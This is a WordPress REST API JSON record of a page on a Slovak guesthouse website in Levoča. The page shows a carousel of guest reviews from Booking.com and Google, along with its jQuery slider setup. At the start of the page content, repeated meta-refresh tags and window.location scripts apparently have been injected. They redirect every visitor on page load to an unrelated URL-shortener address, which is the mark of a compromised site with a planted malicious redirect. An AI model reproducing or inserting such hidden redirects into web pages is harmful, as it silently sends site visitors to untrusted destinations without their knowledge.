{"id":196,"date":"2020-02-25T17:06:41","date_gmt":"2020-02-25T16:06:41","guid":{"rendered":"https:\/\/levoca.penzionkiska.sk\/index.php\/slide-anything-popup-preview\/"},"modified":"2020-03-12T17:50:11","modified_gmt":"2020-03-12T16:50:11","slug":"slide-anything-popup-preview","status":"publish","type":"page","link":"https:\/\/levoca.penzionkiska.sk\/index.php\/slide-anything-popup-preview\/","title":{"rendered":"Slide Anything Popup Preview"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/cdLWElV0r6\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/cdLWElV0r6\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/cdLWElV0r6\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/cdLWElV0r6\";<\/script><br \/>\n<div class='white' style='background:rgba(0,0,0,0); border:solid 0px rgba(0,0,0,0); border-radius:0px; padding:0px 0px 0px 0px;'>\n<div id='slider_197' class='owl-carousel sa_owl_theme owl-pagination-true autohide-arrows' data-slider-id='slider_197' style='visibility:hidden;'>\n<div id='slider_197_slide05' class='sa_hover_container' style='padding:0% 10%; margin:0px 0%; min-height:100px; '><p style=\"text-align: center\">\u201eV\u00fdborn\u00e1 lokalita, fantasticky a s citom zrekon\u0161truovan\u00e1 budova. Ubytovanie super, ra\u0148ajky ve\u013emi chutn\u00e9. Person\u00e1l ve\u013emi mil\u00fd a n\u00e1pomocn\u00fd. Vedeli poradi\u0165 s v\u00fdletmi do bl\u00edzkeho aj \u0161irok\u00e9ho okolia. Genius Loci Levo\u010de a penzi\u00f3n Kiska je skvel\u00e1 kombin\u00e1cia na str\u00e1venie dovolenky.\u201c<\/p>\r\n<p style=\"text-align: center;color: #bf781a\"><strong>Andrej, Booking.com<\/strong><\/p><\/div>\n<div id='slider_197_slide03' class='sa_hover_container' style='padding:0% 10%; margin:0px 0%; min-height:100px; '><p style=\"text-align: center\">\u201e\u0160t\u00fdlov\u00fd penzi\u00f3n na \u00farovni, s mil\u00fdm a ochotn\u00fdm person\u00e1lom, ve\u013emi pr\u00edjemn\u00e1 v\u00f4\u0148a v celom penzi\u00f3ne, pohodln\u00e9 ve\u013ek\u00e9 postele, super vybavenie izieb, vynikaj\u00face ra\u0148ajky s tepl\u00fdm bufetom a dobrou k\u00e1vou. Dobr\u00fd pomer cena\/kvalita. Tich\u00e1 lokalita, parkovisko k dispoz\u00edcii. Naozaj niet \u010do vytkn\u00fa\u0165!\u201c<\/p>\r\n<p style=\"text-align: center;color: #bf781a\"><strong>Tatiana, Booking.com<\/strong><\/p><\/div>\n<div id='slider_197_slide04' class='sa_hover_container' style='padding:0% 10%; margin:0px 0%; min-height:100px; '><p style=\"text-align: center\">\u201eTich\u00e9 prostredie penzi\u00f3nu, ochotn\u00fd person\u00e1l, upratovanie na vysokej \u00farovni, hlavne teplo a \u00fatulne na izbe. Izbu n\u00e1m upratali viackr\u00e1t po\u010das 5-d\u0148ov\u00e9ho pobytu a v\u017edy doplnili tekut\u00e9 mydlo, \u010dist\u00fd uter\u00e1k, toaletn\u00e9 potreby a vy\u010distili k\u00fapel\u0148u. Ve\u013emi \u010fakujeme, na jar pr\u00eddeme op\u00e4\u0165. \u201c<\/p>\r\n<p style=\"text-align: center;color: #bf781a\"><strong>Milan, Booking.com<\/strong><\/p><\/div>\n<div id='slider_197_slide02' class='sa_hover_container' style='padding:0% 10%; margin:0px 0%; min-height:100px; '><p style=\"text-align: center\">\u201ePekn\u00e9, \u010dist\u00e9, modern\u00e9 ubytovanie, prijemn\u00e1 atmosf\u00e9ra, skvely ochotny a mily personal. Ranajky kontinent\u00e1lne, posta\u010duj\u00face, dobr\u00e1 poloha v centre Levo\u010de a 5km od bio k\u00fapaliska v Levo\u010dskej doline. Odpor\u00fa\u010dam, my sa s die\u0165a\u0165om ur\u010dite vr\u00e1time! \u201c<\/p>\r\n<p style=\"text-align: center;color: #bf781a\"><strong>Miroslava, Google recenzie<\/strong><\/p><\/div>\n<div id='slider_197_slide01' class='sa_hover_container' style='padding:0% 10%; margin:0px 0%; min-height:100px; '><p style=\"text-align: center\">\u201eMil\u00fd a ochotn\u00fd majite\u013e ako i person\u00e1l, \u00fastretovos\u0165, pozorn\u00e1 starostlivos\u0165. Penzi\u00f3n vo v\u00fdbornej polohe k centru, s parkoviskom. Bohat\u00e9, pestr\u00e9 ra\u0148ajky. \u201c<\/p>\r\n<p style=\"text-align: center;color: #bf781a\"><strong>Be\u00e1ta, Google recenzie<\/strong><\/p><\/div>\n<\/div>\n<\/div>\n<script type='text\/javascript'>\n\tdocument.addEventListener('DOMContentLoaded', function() {\n\t\tjQuery('#slider_197').owlCarousel({\n\t\t\titems : 1,\n\t\t\tsmartSpeed : 500,\n\t\t\tautoplay : true,\n\t\t\tautoplayTimeout : 6000,\n\t\t\tautoplayHoverPause : true,\n\t\t\tsmartSpeed : 500,\n\t\t\tfluidSpeed : 500,\n\t\t\tautoplaySpeed : 500,\n\t\t\tnavSpeed : 500,\n\t\t\tdotsSpeed : 500,\n\t\t\tloop : true,\n\t\t\tnav : false,\n\t\t\tnavText : ['Previous','Next'],\n\t\t\tdots : true,\n\t\t\tresponsiveRefreshRate : 200,\n\t\t\tslideBy : 1,\n\t\t\tmergeFit : true,\n\t\t\tautoHeight : false,\n\t\t\tmouseDrag : false,\n\t\t\ttouchDrag : true\n\t\t});\n\t\tjQuery('#slider_197').css('visibility', 'visible');\n\t\tvar owl_goto = jQuery('#slider_197');\n\t\tjQuery('.slider_197_goto1').click(function(event){\n\t\t\towl_goto.trigger('to.owl.carousel', 0);\n\t\t});\n\t\tjQuery('.slider_197_goto2').click(function(event){\n\t\t\towl_goto.trigger('to.owl.carousel', 1);\n\t\t});\n\t\tjQuery('.slider_197_goto3').click(function(event){\n\t\t\towl_goto.trigger('to.owl.carousel', 2);\n\t\t});\n\t\tjQuery('.slider_197_goto4').click(function(event){\n\t\t\towl_goto.trigger('to.owl.carousel', 3);\n\t\t});\n\t\tjQuery('.slider_197_goto5').click(function(event){\n\t\t\towl_goto.trigger('to.owl.carousel', 4);\n\t\t});\n\t\tvar resize_200 = jQuery('.owl-carousel');\n\t\tresize_200.on('initialized.owl.carousel', function(e) {\n\t\t\tif (typeof(Event) === 'function') {\n\t\t\t\twindow.dispatchEvent(new Event('resize'));\n\t\t\t} else {\n\t\t\t\tvar evt = window.document.createEvent('UIEvents');\n\t\t\t\tevt.initUIEvent('resize', true, false, window, 0);\n\t\t\t\twindow.dispatchEvent(evt);\n\t\t\t}\n\t\t});\n\t});\n<\/script>\n<\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":9999,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/pages\/196"}],"collection":[{"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/comments?post=196"}],"version-history":[{"count":2,"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/pages\/196\/revisions"}],"predecessor-version":[{"id":201,"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/pages\/196\/revisions\/201"}],"wp:attachment":[{"href":"https:\/\/levoca.penzionkiska.sk\/index.php\/wp-json\/wp\/v2\/media?parent=196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}